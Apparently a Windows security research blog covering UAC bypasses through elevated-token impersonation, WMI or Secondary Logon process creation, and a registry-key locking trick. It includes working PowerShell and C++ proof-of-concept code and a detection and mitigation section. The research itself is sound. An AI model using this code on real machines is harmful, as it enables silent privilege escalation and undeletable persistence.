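// PROCESS_QUERY_LIMITED_INFORMATION, then ask for its token. Going by
// the documentation this shouldn't work, but it does.
void DumpTokenAccess(DWORD pid) {
  HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
  HANDLE token = NULL;
  if (OpenProcessToken(proc, TOKEN_QUERY | TOKEN_DUPLICATE, &token)) {
    printf("Opened token despite only QueryLimitedInformation access\n");
    CloseHandle(token);
  }
  CloseHandle(proc);
}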

What's going on? Basically the documentation is wrong: you don't need QueryInformation to open the process token, only QueryLimitedInformation. You can disassemble NtOpenProcessTokenEx in the kernel if you don't believe me:

NTSTATUS NtOpenProcessTokenEx(HANDLE ProcessHandle,
                              ACCESS_MASK DesiredAccess,
                              DWORD HandleAttributes,
                              PHANDLE TokenHandle) {
  EPROCESS* ProcessObject;
  NTSTATUS status = ObReferenceObjectByHandle(ProcessHandle,
      PROCESS_QUERY_LIMITED_INFORMATION,
      PsProcessType,
      &ProcessObject,
      NULL);
  ...
}

Going back to Vista it's always been the case that only QueryLimitedInformation was needed, contrary to the documentation. While you still need to be able to access the token through its DACL, it turns out that Token objects also use the Default DACL, so they grant Read and Execute access to the Logon Session SID. But doesn't the Token have the same mandatory policy as Processes? Well let's look, we can modify the IL Policy dump script from Part 1 to use a token object:

# Get current primary token's mandatory label
$sacl = $(Get-NtToken -Primary).SecurityDescriptor.Sacl
Write-Host "Policy is $([NtApiDotNet.MandatoryLabelPolicy]$sacl[0].Mask)"

And the result is: "Policy is NoWriteUp". So while we can't modify the token (we couldn't anyway due to the Default DACL) we can at least read it. But again this might not seem especially interesting, what use is Read access? As shown earlier Read gives you a few interesting rights: AssignPrimary, Duplicate and Impersonate. What's to stop you now creating a new Process, or Impersonating the token? Well I'd refer you to my presentation at Shakacon/Blackhat on this very topic. To cut a long story short, creating a new process is virtually impossible due to the limits imposed by the kernel function SeIsTokenAssignableToProcess (and the lack of the SeAssignPrimaryTokenPrivilege), but on the other hand impersonation takes a different approach, calling SeTokenCanImpersonate as shown in the following diagram.


The diagram is the rough flow chart for deciding whether a process can impersonate another token (assuming you don't have SeImpersonatePrivilege, which we don't). We can meet every criterion except one. The kernel checks if the current process's IL is greater-or-equal to the IL of the token being impersonated. If the process IL is less than the token's IL then the impersonation token is dropped to Identification level, stopping us using it to elevate our privileges. While we can't increase a token's IL we can reduce it, so all we need to do is set the token IL to the same as the process' IL before impersonating and in theory we should become a Medium IL administrator.
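In native API terms the plan looks roughly like the following sketch (hypothetical and simplified; note it works on a duplicate of the token, which is exactly the issue discussed next):

#include <windows.h>

// Sketch: clone the elevated token as an impersonation token, then drop
// its integrity level to Medium so SeTokenCanImpersonate will pass.
HANDLE CloneAtMediumIl(HANDLE elevated_token) {
  HANDLE dup = NULL;
  // The duplicate is a new object whose mandatory label comes from *our*
  // IL, so we get write access to it even though the source was High IL.
  DuplicateTokenEx(elevated_token, TOKEN_ALL_ACCESS, NULL,
                   SecurityImpersonation, TokenImpersonation, &dup);

  // Build the Medium IL SID: S-1-16-8192.
  SID_IDENTIFIER_AUTHORITY authority = SECURITY_MANDATORY_LABEL_AUTHORITY;
  PSID il_sid = NULL;
  AllocateAndInitializeSid(&authority, 1, SECURITY_MANDATORY_MEDIUM_RID,
                           0, 0, 0, 0, 0, 0, 0, &il_sid);

  TOKEN_MANDATORY_LABEL label = { 0 };
  label.Label.Sid = il_sid;
  label.Label.Attributes = SE_GROUP_INTEGRITY;
  SetTokenInformation(dup, TokenIntegrityLevel, &label,
                      sizeof(label) + GetLengthSid(il_sid));
  FreeSid(il_sid);
  return dup;
}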

There is one small issue to deal with before we do that: setting the IL is a write operation, and we don't have write access to the token. However it turns out that as we have Duplicate access we can call DuplicateToken which clones the entire token. We'd need to get an impersonation token anyway, which requires duplication, so this isn't a major issue. The important fact is the resulting duplicated token gives us Read, Write and Execute access to the new token object. As the new Token object's Mandatory Label is set to the caller's IL (which is Medium), not the IL inside the token, the kernel can grant us full access to it, confusing I know. Note that this isn't giving us Write access to the original token, just a copy of it. Time for PoC||GtfO:

$token = Use-NtObject($ps = Get-NtProcess -Name mmc.exe) {
    Get-NtToken -Primary -Process $ps[0] -Duplicate `
        -ImpersonationLevel Impersonation `
        -TokenType Impersonation `
        -IntegrityLevel Medium
}
Use-NtObject($token.Impersonate()) {
    [System.IO.File]::WriteAllText("C:\windows\test.txt", "Hello")
}

And you should see it creates a text file, C:\Windows\test.txt with the contents Hello. Or you could use the New-Service cmdlet to create a new service which will run as LocalSystem, you're an administrator after all even if running at Medium IL. You might be tempted to just enable SeDebugPrivilege and migrate to a system process directly, but if you try that something odd happens:

# Will indicate SeDebugPrivilege is disabled
$token.GetPrivilege("SeDebugPrivilege").Enabled
# Try enabling the privilege.
$token.SetPrivilege("SeDebugPrivilege", $true)
# Check again, will still be disabled.
$token.GetPrivilege("SeDebugPrivilege").Enabled

You'll find that no matter how hard you try SeDebugPrivilege (and things like SeBackupPrivilege, SeRestorePrivilege) just cannot be enabled. This is another security measure that the UAC designers chose which in practice makes little realistic difference. You can't enable a small set of GOD privileges if the IL of the token is less than High. However you can still enable things like SeMountVolumePrivilege (could have some fun with that) or SeCreateSymbolicLinkPrivilege. We'll get back to this behavior later as it turns out to be important. Most importantly this behavior doesn't automatically disable the Administrators group which means we can still impersonate as a privileged user.

This works amazingly well as long as you run the example on Windows Vista, 7, 8 or 8.1. However on Windows 10 you'll get an error such as the following:

Use-NtObject : Exception calling "WriteAllText" with "2" argument(s): "Either a required impersonation level was not provided, or the provided impersonation level is invalid."

This error message means that the SeTokenCanImpersonate check failed and the impersonation token got reverted to an Identification token. Clearly Microsoft knows something we don't. So that's where I'll leave it for now, come back when I post Part 3 for the conclusion, specifically getting this to work on Windows 10 and bypassing the new security checks.


Reading Your Way Around UAC (Part 3)

This is the final part in my series on UAC (Part 1 and Part 2 links). In Part 2 we found that if there's any elevated process running in a split-token admin session on Windows earlier than 10 we could read the primary token from that process as a normal user and impersonate it, giving us 99% of admin privileges without a prompt. Of course there's the proviso that there's an elevated process running on the same desktop, but I'd say that's pretty likely for almost any user. At least in most cases you can use silent elevation (through auto elevation, or a scheduled task for instance) to get a process running elevated; you don't care what the process is doing, just that it exists.

Also it's been pointed out that what I described in Part 2 sounds exactly like the UAC Bypass used in the Stinger Module "released" in the Vault 7 dumps. It could very well be, I'd be surprised if someone didn't already know about this trick. I've not seen the actual module, and I'm not that interested to find out, but if anyone else is then go for it.

Broken Windows

Anyway on to Windows 10. It seems that the impersonation check fails and we're dumped down to an Identification token which is pretty much useless. It seems likely that Microsoft have done something to mitigate this attack, presumably they know about this exploitation route. This needs to be reiterated: just because Microsoft fixes a UAC bypass doesn't mean that they're now treating it as a security boundary.

The likely candidate for additional checks is in the SeTokenCanImpersonate function in the kernel, and if we look we find it's been changed up a bit. Compare the following diagram to the similar one in Part 2 and you'll notice a couple of differences:

I've highlighted the important additional step, the kernel now does an elevation check on the impersonation token to determine if the caller is allowed to impersonate it. A simplified version is as follows:

TOKEN* process_token = ...;
TOKEN* imp_token = ...;

#define LIMITED_LOGON_SESSION 0x4

if (SeTokenIsElevated(imp_token)) {
  if (!SeTokenIsElevated(process_token) &&
      (process_token->LogonSession->Flags & LIMITED_LOGON_SESSION)) {
    return STATUS_PRIVILEGE_NOT_HELD;
  }
}

The additional check first determines if the impersonation token is elevated (we'll go into what this means in a bit). If it's not elevated then the function carries on with its other checks as prior to Windows 10. However if it is elevated (which is the case from our PoC in Part 2) it then does an elevation check on the process token. If the process token is not elevated the function will check if a specific flag is set for the Token's Logon Session. If the flag is set then an error is returned. What this means is that there's now only two scenarios where we can impersonate an elevated token: if the process doing the impersonation is already elevated, or if the process token's logon session doesn't have this flag set. Our PoC from Part 2 will clearly fail the first scenario and presumably fails the second. We can check this using a kernel debugger by running an elevated and a non-elevated copy of cmd.exe and checking the flags.

PROCESS ffffb50dd0d0a7c0
    Image: cmd.exe
    Token                             ffff980d0ab5c060
    * SNIP *

kd> dx -r1 ((nt!_TOKEN*)0xffff980d0ab5c060)->LogonSession->Flags
0xc [Type: unsigned long]

This process token is non-elevated; the flags are set to 0xC, which includes the value 4, the LIMITED_LOGON_SESSION flag.

PROCESS ffffb50dd0cc1080
    Image: cmd.exe
    Token                             ffff980d0a2478e0
    * SNIP *

kd> dx -r1 ((nt!_TOKEN*)0xffff980d0a2478e0)->LogonSession->Flags
0xa [Type: unsigned long]

And now the elevated process token: the flags are 0xA, which doesn't contain the LIMITED_LOGON_SESSION flag. So we are getting caught by this second check. Why is this check even there at all? As far as I can tell it's for compatibility, possibly with Chrome *ahem*. The additional check was added prior to the final release of Windows 10 10586 (in the insider previews this additional logon session flag check didn't exist, and in 10240 the whole elevation check was present but wasn't on by default). So assuming for the moment we can't get a process token without that flag set, what about the SeTokenIsElevated function, is that exploitable in any way? The code of SeTokenIsElevated looks something like the following:

BOOLEAN SeTokenIsElevated(_TOKEN* token) {
  DWORD* elevated;
  SeQueryInformationToken(token, TokenElevation, &elevated);
  return *elevated;
}

The function queries a token information property, TokenElevation, which returns a non-zero value if the token is elevated. The SeQueryInformationToken API is the kernel equivalent to NtQueryInformationToken from user mode (mostly anyway), so we should also be able to query the elevation state using PS. Let's change a script we had in Part 2 to print the elevation state instead of integrity level as we proved last time that IL doesn't mean a token is really privileged.

function Write-ProcessTokenInfo {
    Param([NtApiDotNet.NtProcess]$Process)
    Use-NtObject($token = Get-NtToken -Primary -Process $Process) {
        $token | Format-List -Property User, TokenType, Elevated
    }
}
Use-NtObject($ps = Get-NtProcess -Name mmc.exe) {
    Write-ProcessTokenInfo $ps[0]
}
Write-ProcessTokenInfo $(Get-NtProcess -Current)

This outputs:

User      : domain\user
TokenType : Primary
Elevated  : True

User      : domain\user
TokenType : Primary
Elevated  : False

So what does the kernel use to make the determination? Clearly it's not the IL, as we've already changed that and it still failed. If you dig into the implementation of SeQueryInformationToken the kernel checks two things: firstly whether the token has any GOD privileges (it just so happens the list matches the ones we couldn't enable in Part 2), and secondly whether the Token's groups contain any "elevated" SIDs.

The list of GOD privileges that I know of are as follows:
  • SeCreateTokenPrivilege
  • SeTcbPrivilege
  • SeTakeOwnershipPrivilege
  • SeLoadDriverPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeDebugPrivilege
  • SeImpersonatePrivilege
  • SeRelabelPrivilege
  • SeDelegateSessionUserImpersonatePrivilege
As an aside, isn't it odd that SeAssignPrimaryTokenPrivilege isn't in that list? Not that it matters, Administrators don't get that privilege by default, so perhaps that's why.

The "elevated" SIDs don't seem to have an explicit (full) blacklist, instead the kernel calls the function RtlIsElevatedRid with each group and uses that to determine if the SID is an elevated SID. The only check is on the last relative identifier in the SID not the whole SID and looks something like this:

BOOLEAN RtlIsElevatedRid(SID_AND_ATTRIBUTES* sid_and_attr) {
  if (sid_and_attr->Attributes &
      (SE_GROUP_USE_FOR_DENY_ONLY | SE_GROUP_INTEGRITY)) {
    return FALSE;
  }

  PSID sid = sid_and_attr->Sid;
  BYTE auth_count = *RtlSubAuthorityCountSid(sid);
  DWORD last_rid = *RtlSubAuthoritySid(sid, auth_count - 1);
  DWORD check_rids[] = { 0x200, 0x204, 0x209, 0x1F2, 0x205,
                         0x206, 0x207, 0x208, 0x220, 0x223,
                         0x224, 0x225, 0x226, 0x227, 0x229,
                         0x22A, 0x22C, 0x239, 0x72 };
  for (int i = 0; i < countof(check_rids); ++i) {
    if (check_rids[i] == last_rid) {
      return TRUE;
    }
  }
  return FALSE;
}

There's currently 19 banned RIDs. To pick an example, 0x220 is 544 in decimal. The string SID for the BUILTIN\Administrators group is S-1-5-32-544 so that's clearly one banned SID. Anyway, as we've got Duplicate access we can make a non-elevated Token using CreateRestrictedToken to set some groups to Deny Only and remove GOD privileges. That way we should be able to impersonate a token with some funky privileges such as SeMountVolumePrivilege which are still allowed, but that's not very exciting. The thought occurs: can we somehow create a process we control which doesn't have the logon session flag and therefore bypass the impersonation check?
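For reference, a minimal sketch of that filtering step in Win32 might look like this (hypothetical; only two deleted privileges are shown for brevity, you'd cover the whole banned list, or alternatively pass the LUA_TOKEN flag which applies similar filtering):

#include <windows.h>

// Sketch: make a copy of the token which SeTokenIsElevated() should treat
// as non-elevated: Administrators becomes deny-only and the "GOD"
// privileges are deleted. Error handling omitted.
HANDLE MakeNonElevated(HANDLE token) {
  BYTE sid_buf[SECURITY_MAX_SID_SIZE];
  DWORD sid_len = sizeof(sid_buf);
  CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, sid_buf, &sid_len);
  SID_AND_ATTRIBUTES disable_sid = { (PSID)sid_buf, 0 };

  // Only two shown; repeat for the rest of the banned privilege list.
  LUID_AND_ATTRIBUTES delete_privs[2] = { 0 };
  LookupPrivilegeValueW(NULL, L"SeDebugPrivilege", &delete_privs[0].Luid);
  LookupPrivilegeValueW(NULL, L"SeImpersonatePrivilege", &delete_privs[1].Luid);

  HANDLE new_token = NULL;
  CreateRestrictedToken(token, 0, 1, &disable_sid, 2, delete_privs,
                        0, NULL, &new_token);
  return new_token;
}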

Getting Full Admin Privileges

So we're now committed, we want to get back that which Microsoft have taken away. The first thought would be: can we just use the elevated token to create a new process? As I described in Part 2, due to the various checks (and the fact we don't have SeAssignPrimaryTokenPrivilege), we can't do so directly. But what about indirectly? There's a number of system services where the following pattern can be observed:

void CreateProcessWithCallerToken(string path) {
  RpcImpersonateClient(nullptr);
  HANDLE Token = OpenThreadToken();
  HANDLE PrimaryToken = DuplicateToken(Token, TokenPrimary);
  CreateProcessAsUser(PrimaryToken, path, ...);
}

This code creates a new process based on the caller's token, be that over RPC, COM or Named Pipes. This in itself isn't necessarily a security risk, the new process would only have the permission that the caller already had during impersonation. Except that there's numerous places in the kernel, including our impersonation check, that explicitly check the process token and not the current impersonation token. Therefore being able to impersonate a token doesn't necessarily mean that the resulting process isn't slightly more privileged in some ways. In this case that's exactly what we get, if we can convince a system service to create a process using the non-elevated copy of an elevated token the logon session flags won't have the LIMITED_LOGON_SESSION flag set as the logon session is shared between all Token object instances. We can therefore do the following to get back full admin privileges:
  1. Capture the admin token and create a restricted version which is no longer elevated.
  2. Impersonate the token and get a system service to create a new process using that token. This results in a low-privilege new process which happens to be in the non-limited logon session.
  3. Capture the original full privileged admin token in the new process and impersonate, as our logon session doesn't have the LIMITED_LOGON_SESSION flag the impersonation check passes and we've got full privilege again.
A good example of this process creation pattern is the WMI Win32_Process::Create call. It's a pretty simple function and doesn't do a lot of checking. It will just create the new process based on the caller. It sounds ideal and PS has good support for WMI. Sadly COM's weird security and cloaking rules make this a pain to do in .NET, let alone PS. I do have a C++ version; it's not simple or pretty, but it works from Vista through Windows 10 Creators Update. I've not checked the latest insider preview builds (currently running RS3) to see if this is fixed yet, perhaps if it isn't yet it will be soon. I might release the C++ version if there's enough interest.
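Roughly, the core of such a C++ version might look like the following (a hypothetical, heavily trimmed sketch with no error handling or cleanup; the crucial detail is dynamic cloaking so that WMI sees our impersonation token when Win32_Process::Create is called):

#include <windows.h>
#include <wbemidl.h>
#pragma comment(lib, "wbemuuid.lib")

// Sketch: while impersonating the non-elevated copy of the elevated token,
// ask WMI to create a process. The new process gets our token, but it
// lives in the admin's (non-limited) logon session.
void SpawnViaWmi(HANDLE lua_token, const wchar_t* cmdline) {
  CoInitializeEx(NULL, COINIT_MULTITHREADED);
  // EOAC_DYNAMIC_CLOAKING makes outgoing calls use the current thread token.
  CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT,
                       RPC_C_IMP_LEVEL_IMPERSONATE, NULL,
                       EOAC_DYNAMIC_CLOAKING, NULL);

  IWbemLocator* locator = NULL;
  CoCreateInstance(CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER,
                   IID_IWbemLocator, (void**)&locator);
  IWbemServices* services = NULL;
  locator->ConnectServer(SysAllocString(L"ROOT\\CIMV2"), NULL, NULL,
                         NULL, 0, NULL, NULL, &services);
  CoSetProxyBlanket(services, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL,
                    RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE,
                    NULL, EOAC_DYNAMIC_CLOAKING);

  // Build the input parameters for Win32_Process::Create.
  IWbemClassObject* process_cls = NULL;
  IWbemClassObject* in_sig = NULL;
  IWbemClassObject* in_params = NULL;
  services->GetObject(SysAllocString(L"Win32_Process"), 0, NULL,
                      &process_cls, NULL);
  process_cls->GetMethod(L"Create", 0, &in_sig, NULL);
  in_sig->SpawnInstance(0, &in_params);

  VARIANT v;
  VariantInit(&v);
  v.vt = VT_BSTR;
  v.bstrVal = SysAllocString(cmdline);
  in_params->Put(L"CommandLine", 0, &v, 0);

  // Impersonate the filtered token just for the duration of the call.
  SetThreadToken(NULL, lua_token);
  services->ExecMethod(SysAllocString(L"Win32_Process"),
                       SysAllocString(L"Create"), 0, NULL, in_params,
                       NULL, NULL);
  RevertToSelf();
}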

Still, it would be nice if I could give a simple script for use in PS for the hell of it. One interesting observation I made when playing with this is that impersonating the restricted version of the elevated token while calling the LogonUser API with the LOGON32_LOGON_NEW_CREDENTIALS logon type returns you back the elevated token again (even with a High IL). Run the following script to see the result ($token needs to be a reference to the elevated token).

# Filter elevated token down to a non-elevated token
$lua_token = Get-NtFilteredToken -Token $token -Flags LuaToken
$lua_token | Format-List -Property User, Elevated, IntegrityLevel
# Impersonate non-elevated token and change credentials
Use-NtObject($lua_token.Impersonate()) {
    Get-NtToken -Logon -User ABC -LogonType NewCredentials
} | Format-List -Property User, Elevated, IntegrityLevel

This is interesting behavior, but it still doesn't seem immediately useful. Normally the result of LogonUser can be used to create a new process, however as the elevated token is still in a separate logon session it won't work. There is however one place I know of where you can abuse this "feature": the Secondary Logon service, and specifically the exposed CreateProcessWithLogon API. This API allows you to create a new process by first calling LogonUser (well really LsaLogonUser but anyway) and takes a LOGON_NETCREDENTIALS_ONLY flag, which means we don't need any special permissions, nor do we need to know a real password.

As the Secondary Logon service is privileged it can happily create a new process with the newly minted elevated token, so all we need to do is call CreateProcessWithLogon while impersonating the non-elevated token and we get an arbitrary process running as full administrator (barring some privileges we had to remove) and even a High IL. The only problem is we've changed our password in the session to something invalid, but it doesn't matter for local access. As it's still pretty long I've uploaded the full script here, but the core is these few lines:

Use-NtObject($lua_token.Impersonate()) {
    [SandboxAnalysisUtils.Win32Process]::CreateProcessWithLogin(
        "Badger", "Badger", "Badger", "NetCredentialsOnly",
        "cmd.exe", "cmd.exe", 0, "WinSta0\Default")
}
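For completeness, the equivalent native call is roughly the following (a hypothetical sketch; the credentials are junk on purpose as NewCredentials logons don't validate them for local access):

#include <windows.h>

// Sketch: ask the Secondary Logon service for a new process with junk
// "network only" credentials. Call this while impersonating the filtered
// non-elevated token; per the behavior above, the new logon hands back
// the elevated token in its own logon session.
void SpawnWithNewCredentials(void) {
  STARTUPINFOW si = { sizeof(si) };
  PROCESS_INFORMATION pi = { 0 };
  wchar_t desktop[] = L"WinSta0\\Default";
  wchar_t cmdline[] = L"cmd.exe";
  si.lpDesktop = desktop;
  // Username/domain/password are junk; NewCredentials doesn't check them.
  CreateProcessWithLogonW(L"Badger", L"Badger", L"Badger",
                          LOGON_NETCREDENTIALS_ONLY, NULL, cmdline,
                          0, NULL, NULL, &si, &pi);
}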

Detection and Mitigation

Is there a good way of detecting this UAC bypass in use? Prior to Windows 10 it can be done pretty silently, a thread will magically become more privileged. So I suppose you might be able to detect that taking place, namely an elevated token being impersonated by a non-elevated process. For Windows 10 it should be easier as you need to do one or more dances with processes, at least as I've implemented it. I'm not much into the latest and greatest in DFIR, so perhaps someone else is better placed to look at this :-)

On the mitigation side it's simple:

DON'T USE SPLIT-TOKEN ADMINISTRATOR ACCOUNTS FOR ANYTHING YOU CARE ABOUT.

Or just don't get malware on your machine in the first place ;-) About the safest way of using Windows is to run as a normal user and use Fast User Switching to login to a new session with a separate administrator account. The price of Fast User Switching is the friction of hitting CTRL+ALT+DEL, then selecting Switch User, then typing in a password. Perhaps though that friction has additional benefits.

What about Over-The-Shoulder elevation, where you need to supply the username and password of a different user, does that suffer from the same problem? Due to the design of UAC those "Other User" processes also have the same Logon Session SID access rights, so a normal, non-admin user can access the elevated token in the same way. Admittedly just having the token isn't necessarily exploitable, but attacks only get better; would you be willing to take the bet that it's not exploitable?

Wrapping Up

The design behind UAC has all the hallmarks of trying to be secure, then finding it impossible to be so without severely compromising usability. So presumably it was ret-conned into something else entirely. Perhaps it's finally time for Microsoft to take UAC out the back and give it a proper sending off. I wonder if with modern versions of Windows the restrictions on compatibility can be dropped, as UAC has served its purpose of acting as a forcing function to try and make applications behave better. Then again MS do seem to be trying to plug the leaks, which is surprising considering their general stance that it's not a security boundary, so I don't really know what to think.

Anyway, unless Microsoft change things substantially you should consider UAC to be entirely broken by design, in more fundamental ways than people perhaps realized (except perhaps the CIA). You don't need to worry about shared resources, bad environment variables, auto-elevating applications and the like. If malware is running in your split-token account you've given it Administrator access. In the worst case all it takes is patience, waiting for you to elevate once for any reason. Once you've done that you're screwed.

Locking Your Registry Keys for Fun and, Well, Just Fun I Guess

Let's assume you have some super important registry keys that you don't want anyone to modify or delete, how might you do it? One way is to change the security descriptor of the registry key to prevent others modifying it. However when combined with a kernel driver (such as AV) or an admin with sufficient privilege this can be trivially bypassed. Another common trick is to embed NUL characters into the key or value names you want to protect. That trick tends to break Win32 API users such as typical registry editors, as the Win32 APIs use NUL terminated strings whereas the kernel APIs do not. However that won't stop someone more persistent. The final trick I can think of would be to write a kernel driver which uses the "Registry Filter Callback" APIs to block access to the keys. However Microsoft are making it as hard as possible to run arbitrary kernel code (well, legit kernel code anyway), so writing a driver sounds like an unnecessary extravagance.

So what can we do? Turns out there is an API in the kernel called NtLockRegistryKey, though unsurprisingly it isn't documented. It's pretty obvious what the parameters are based on 2 seconds of RE; it looks like the following:

NTSTATUS NtLockRegistryKey(HANDLE KeyHandle);

All the system call takes is a registry key handle. After adding it to my NtObjectManager PowerShell module we can call it and see what happens:
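If you're not using the module, the same call can be made directly against ntdll (a sketch; I'm assuming NtLockRegistryKey gets an exported stub in ntdll like other Nt* system calls, it's certainly not in any SDK header):

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI* NtLockRegistryKey_t)(HANDLE KeyHandle);

// Sketch: resolve the undocumented system call and try it on a key handle.
NTSTATUS LockKey(HANDLE key) {
  NtLockRegistryKey_t NtLockRegistryKey =
      (NtLockRegistryKey_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),
                                          "NtLockRegistryKey");
  if (!NtLockRegistryKey)
    return (NTSTATUS)0xC0000225; // STATUS_NOT_FOUND
  return NtLockRegistryKey(key);
}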


Apparently we don't have a privilege enabled to lock the key. Turns out no matter what privilege you enable it still doesn't work, something odd is going on. Let's look back at the kernel to see if we can find the privilege we require:

NTSTATUS NtLockRegistryKey(HANDLE Handle) {
  if (KeGetCurrentThread()->PreviousMode != KernelMode)
    return STATUS_PRIVILEGE_NOT_HELD;
  ...
}

Apparently from this code the privilege we need is to be running in the kernel! If we need that then we might as well just write that registry filter driver. Still, all is not necessarily lost, perhaps there's some code in the kernel which calls this function to lock existing registry keys we can abuse? You might assume this could also be called by a kernel driver, but neither the Zw nor the Nt version of the system call is exported by NTOSKRNL, making it very unlikely any legitimate driver will call it. A quick XREF check in IDA shows exactly one caller, NtLockProductActivationKeys. Why am I not surprised it's used for DRM purposes?

Anyway, let's do a quick bit of RE on the kernel function to work out what it's doing with registry keys.

NTSTATUS NtLockProductActivationKeys() {
  HANDLE RootKeyHandle;
  UNICODE_STRING RootKey;
  OBJECT_ATTRIBUTES ObjectAttributes;

  // Initial path is obfuscated in the kernel.
  RtlInitUnicodeString(&RootKey, L"\\Registry\\Machine\\System\\WPA");
  InitializeObjectAttributes(&ObjectAttributes, &RootKey, ...);
  NTSTATUS status = ZwOpenKey(&RootKeyHandle, KEY_READ, &ObjectAttributes);
  if (NT_SUCCESS(status)) {
    ULONG KeyIndex = 0;
    PKEY_BASIC_INFORMATION KeyInfo = ...; // Allocate a buffer.
    while (ZwEnumerateKey(RootKeyHandle, KeyIndex, KeyBasicInformation,
                          KeyInfo) != STATUS_NO_MORE_ENTRIES) {
      HANDLE SubKeyHandle = OpenKey(RootKeyHandle, KeyInfo->Name);
      if (!IsRegistryKeyLocked(SubKeyHandle)) {
        ZwLockRegistryKey(SubKeyHandle);
      }
      ZwClose(SubKeyHandle);
      ++KeyIndex;
    }
    ZwClose(RootKeyHandle);
  }
  return status;
}

All this code does is open a root key, the "HKLM\System\WPA" key, although if you look at the actual code the key name is "obfuscated" in the binary. Thanks DRM, you so crazy. It then enumerates and opens any sub-keys and calls ZwLockRegistryKey on each key handle. There seem to be no other privilege checks, so this should be callable from user mode, and because the Zw version of the lock key system call is used the previous mode will be Kernel, satisfying the security check requirements.

At this point we don't even know if locking a registry key does anything useful. However we now know that sub-keys under the WPA registry key are locked, so let's try to write a value to one of those sub-keys as an administrator.
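For example, something like the following (hypothetical sketch; the sub-key names under WPA vary per machine):

#include <windows.h>
#include <stdio.h>

// Sketch: open a locked WPA sub-key for write (this succeeds, the DACL
// allows it for admins) and then try to set a value (this fails).
void TryWriteWpa(const wchar_t* subkey_path) {
  HKEY key = NULL;
  // e.g. L"SYSTEM\\WPA\\<some sub-key>", name differs per machine.
  if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey_path, 0,
                    KEY_SET_VALUE, &key) == ERROR_SUCCESS) {
    DWORD value = 1;
    LSTATUS status = RegSetValueExW(key, L"Test", 0, REG_DWORD,
                                    (const BYTE*)&value, sizeof(value));
    // Expect ERROR_ACCESS_DENIED (STATUS_ACCESS_DENIED) here.
    printf("RegSetValueExW returned %d\n", (int)status);
    RegCloseKey(key);
  }
}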


So that's pretty much what we expected: even though we've got SetValue access to the key, trying to set a value fails with STATUS_ACCESS_DENIED. If you look back at how NtLockProductActivationKeys works you might notice that the kernel doesn't lock the WPA key itself, only the enumerated sub-keys. Therefore there's nothing stopping us creating a new sub-key under WPA, re-running NtLockProductActivationKeys and getting a locked key.


So the fun thing about this locking function is it seems to block not just user mode but also kernel mode callers from modifying the key. There doesn't seem to be a public way of unlocking the key again (DRM, remember). There's no ZwUnlockRegistryKey function, and the only way of doing anything would be to grovel in the innards of the Key Control Block to unlock it, which Microsoft have been trying desperately to discourage. The lock prevents any modification and also deleting the key itself (however the function doesn't automatically lock sub-keys). The only way to clear the locked state is to unload the hive (tricky if it's a system hive) or reboot. However the kernel calls NtLockProductActivationKeys very early in the boot process *sigh* DRM *sigh* so it's pretty tricky to find a time when you can just delete the key.

While writing to the WPA location might be okay just to store some configuration, probably what you want is persistence in another location. Fortunately if you check out the implementation you'll find that it doesn't take into account registry key symbolic links. So to protect other parts of the registry just create a sub-key which is actually a symbolic link pointing to a key you want to protect. Then re-run NtLockProductActivationKeys and it will now be locked. If you stick to the SYSTEM hive (such as a service registration) this should even get protected at boot time. Of course the weakness of this is the symbolic link key in WPA doesn't actually get protected itself, so you can delete the symbolic link and on next boot the protection will go away. Of course this doesn't work in most registry tools which blindly follow symbolic links ;-)
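A rough sketch of the symbolic link step using the native API (hypothetical; registry links are created with the REG_OPTION_CREATE_LINK flag and the special SymbolicLinkValue value, and the link name here is made up):

#include <windows.h>
#include <winternl.h>
#include <wchar.h>
#pragma comment(lib, "ntdll.lib")

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// NtCreateKey/NtSetValueKey aren't in winternl.h, declare them manually.
extern "C" NTSTATUS NTAPI NtCreateKey(PHANDLE, ACCESS_MASK,
    POBJECT_ATTRIBUTES, ULONG, PUNICODE_STRING, ULONG, PULONG);
extern "C" NTSTATUS NTAPI NtSetValueKey(HANDLE, PUNICODE_STRING, ULONG,
    ULONG, PVOID, ULONG);

// Sketch: create a link key under WPA pointing at a key we want protected,
// then re-run NtLockProductActivationKeys so the link's target gets locked.
NTSTATUS CreateWpaLink(const wchar_t* target) {
  UNICODE_STRING name;
  RtlInitUnicodeString(&name,
      L"\\Registry\\Machine\\System\\WPA\\MyLink"); // illustrative name
  OBJECT_ATTRIBUTES oa;
  InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

  HANDLE link = NULL;
  NTSTATUS status = NtCreateKey(&link, KEY_ALL_ACCESS | KEY_CREATE_LINK,
                                &oa, 0, NULL, REG_OPTION_CREATE_LINK, NULL);
  if (!NT_SUCCESS(status)) return status;

  UNICODE_STRING value_name;
  RtlInitUnicodeString(&value_name, L"SymbolicLinkValue");
  // REG_LINK data is the target path, without a NUL terminator.
  status = NtSetValueKey(link, &value_name, 0, REG_LINK, (PVOID)target,
                         (ULONG)(wcslen(target) * sizeof(wchar_t)));
  NtClose(link);
  return status;
}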

Anyway, this is a fun, if somewhat silly, feature. I can understand why it's not exposed to user-mode callers but I've literally no idea why it's a system call at all. The strange things DRM does to people's minds.